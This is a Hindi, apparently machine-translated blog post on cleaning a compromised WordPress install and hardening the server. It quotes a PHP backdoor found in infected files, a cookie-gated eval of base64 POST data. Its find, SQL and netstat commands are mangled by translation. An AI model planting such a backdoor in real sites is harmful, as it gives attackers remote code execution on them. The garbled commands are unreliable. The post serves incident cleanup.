WordPress शोषण - वायरस फ़ाइलें, SQL और सर्वर सुरक्षा साफ़ करें।

आप इस पोस्ट को पढ़ने से पहले, आपको यह देखना चाहिए यहाँ पोस्ट, कुछ समझने के लिए. :)

मैंने इसे कई ब्लॉग फ़ाइलों में पाया stealthsettings.com, नीचे दिए गए कोड के समान है, जो वायरस के संक्रमण के परिणामस्वरूप दिखाई दिया का करतब WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPCउपरोक्त फाइल के बारे में है xmlrpc.php से सुस्त, एक में ग्रेप सर्वर, स्रोत कोड में इस तरह का एक बहुत की तरह लग रहा है.

pppffiuuu

संक्रमित फ़ाइलों की सफाई:

Ooookkkk ...
1. सबसे अच्छा समाधान है, यह किया जाता है के रूप में बैकअपऔर साफ डेटाबेस के लिए है पोंछ फ़ाइलें WordPress (आप wp-config.php और फाइलें जो कि सख्ती से wp प्लेटफॉर्म से संबंधित नहीं हैं, उन्हें ध्यान से जांचने के बाद रख सकते हैं) सर्वर से और मूल संस्करण को अपलोड करें 2.5.1 (इस अवसर पर और एक उन्नत संस्करण wp :) बनाने के लिए) http://wordpress.org/download/ . आप अपने सावधान जाँच पर भरोसा नहीं करते हैं तो विषय फाइलों सहित साफ कर लें.

यह प्रभावित हुए हैं लगता है और ब्लॉग पर पहले प्रयोग किया और बस को बदलने नहीं किया गया है कि विषयों की फाइलें, समस्या का समाधान नहीं है.

./एंड्रिया/wp-सामग्री/थीम/default/index.php:

2. खोज और जिसमें सभी फाइलों को नष्ट:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg और WP-info.txt फ़ाइल, यदि कोई हो.

पाते हैं। -नाम “* _new.php”
पाते हैं। -नाम “* _old.php”
पाते हैं। -नाम "* .jpgg"
पाते हैं। -नाम “* _giff”
पाते हैं। -नाम “* _pngg”
पाते हैं। -नाम "wp-info.txt"

3. में / Tmp , खोज और की तरह फ़ोल्डर्स को नष्ट tmpYwbzT2

एसक्यूएल सफाई :

1. तालिका तालिका में wp_options के लिए जाँच करें और लाइनों को हटा दें: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. सभी wp_ मेंoptions, के लिए जाओ active_plugins एक्सटेंशन * _new.php, * _old.php, *. jpgg, *. Giff, *. pngg या एक और विस्तार संदेह है, तो ध्यान से जाँच में से एक में समाप्त होता है कि वहाँ एक प्लगइन है और अगर हटा दें.

3. तालिका में wp_usersअपने अधिकार में कुछ भी नहीं लिखा गया है जो एक उपयोगकर्ता, स्तंभ नहीं है, अगर देखें user_nicename. इस उपयोगकर्ता को हटाएं, लेकिन आईडी कॉलम पर नंबर याद रखें। इस उपयोगकर्ता द्वारा उपयोग किए जाने की संभावना है "WordPress"सीए user_login बनाया और 00 पर दिखाई देता है: 00: 00 0000-00-00.

4. टेबल पर जाएं wp_usermeta और ऊपर आईडी संबंधित सभी लाइनों को हटा दें.

आपके द्वारा यह sql सफाई करने के बाद, अक्षम करें और फिर किसी भी प्लगइन को सक्रिय करें। (ब्लॉग में -> डैशबोर्ड -> प्लगइन्स)

सुरक्षित सर्वर:

1. "निर्देशिका और फाइल कर रहे हैं क्या देखेंलिखने योग्य("chmod 777) और एक डालने का प्रयास करें chmod जो अब किसी भी स्तर पर उनके लेखन की अनुमति नहीं देगा। (chmod 644, उदाहरण के लिए)

खोजें. -पेर्म-2-रास

2. फाइलें सा सेट है क्या देखें SUID या sgid . आप उपयोग नहीं करते हैं, तो उन फ़ाइलों को उन पर डाल chmod 0 या यह होता है कि पैकेज की स्थापना रद्द करें. वे विशेषाधिकार निष्पादित क्योंकि वे ", बहुत खतरनाक हैंसमूह"या फिर"जड़"सामान्य उपयोगकर्ता विशेषाधिकारों के साथ उस फ़ाइल को निष्पादित करने के लिए नहीं.

च पर्म-04000-रास / प्रकार खोजने
च पर्म-02000-रास / प्रकार खोजने

3. बंदरगाहों खुले हैं क्या जाँच करें और इस्तेमाल नहीं कर रहे हैं कि उन बंद करने या सुरक्षित करने के लिए प्रयास करें.

netstat-एक | grep-i सुनो

इतना. मैं देख रहा हूँ कुछ ब्लॉगों पर प्रतिबंध लगा दिया जाता है de Google Search और दूसरे कहते हैं "उसने उन्हें अच्छा किया !!!" . खैर, मैंने उनके लिए किया होता... लेकिन अगर गूगल बैन करने लगे तो आप क्या कहते हैं सभी साइटों गठन  स्पैम है और (ट्रोजन डालTrojan.Clicker.HTML) कुकीज़ में?

तकनीकी प्रेमी के रूप में, मैं 2006 से StealthSettings.com पर खुशी से लेख लिख रहा हूँ। मेरे पास ऑपरेटिंग सिस्टम्स: macOS, Windows और Linux, साथ ही प्रोग्रामिंग भाषाओं और ब्लॉगिंग प्लेटफ़ॉर्म्स (WordPress) और ऑनलाइन स्टोर्स (WooCommerce, Magento, PrestaShop) के साथ विविध अनुभव है।

कैसे करें » एंटीवायरस और सुरक्षा » WordPress शोषण - वायरस फ़ाइलें, SQL और सर्वर सुरक्षा साफ़ करें।

1 पर सोचा "WordPress शोषण - वायरस फ़ाइल की सफाई, एसक्यूएल और सर्वर सुरक्षा।

एक टिप्पणी छोड़ दो